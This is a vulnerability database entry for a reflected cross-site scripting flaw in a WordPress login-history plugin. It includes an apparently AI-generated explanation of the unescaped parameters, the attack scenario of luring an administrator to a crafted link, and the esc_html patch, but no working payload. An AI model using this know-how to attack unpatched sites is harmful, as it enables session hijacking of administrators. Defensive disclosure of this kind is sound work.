CVE-2017-15867
Description
Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2- cpe:2.3:a:user-login-history_project:user-login-history:*:*:*:*:*:wordpress:*:*Range: <=1.5.2
- Range: <=1.5.2
Patches
Vulnerability mechanics
Root cause
"Missing output escaping of user-supplied query parameters in the plugin's listing templates allows reflected cross-site scripting."
Attack vector
An unauthenticated attacker can craft a URL containing malicious JavaScript in any of the listed query parameters (e.g., `date_from`, `username`, `ip_address`) and trick a logged-in WordPress administrator into visiting that link. Because the plugin outputs the parameter values directly into the HTML without escaping, the injected script executes in the context of the admin's session. This is a classic reflected cross-site scripting (XSS) attack [CWE-79].
Affected code
The vulnerability exists in `admin/partials/listing/listing.php` and `public/partials/listing/listing.php`. These files directly output user-supplied `$_GET` parameters (such as `date_from`, `date_to`, `user_id`, `username`, `country_name`, `browser`, `operating_system`, and `ip_address`) into HTML `value` attributes without any sanitization or escaping. [patch_id=6628829]
What the fix does
The patch wraps every `$_GET` parameter output in `esc_html()` (e.g., `esc_html($_GET['date_from'])`), which encodes HTML special characters and prevents script injection. Additionally, the public listing form's `action` attribute was changed from `$_SERVER['REQUEST_URI']` to an empty string, and a cancel/reset link was added to avoid reflecting attacker-controlled URLs. [patch_id=6628829]
Preconditions
- inputThe attacker must trick a logged-in WordPress administrator into clicking a crafted link containing malicious query parameters.
- authThe victim must be authenticated to the WordPress admin area where the plugin's listing page is accessible.
- networkNo special network position is required; the attack is performed over HTTP/HTTPS.
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741nvdPatchThird Party Advisory
- wpvulndb.com/vulnerabilities/8939nvdThird Party Advisory
News mentions
0No linked articles in our index yet.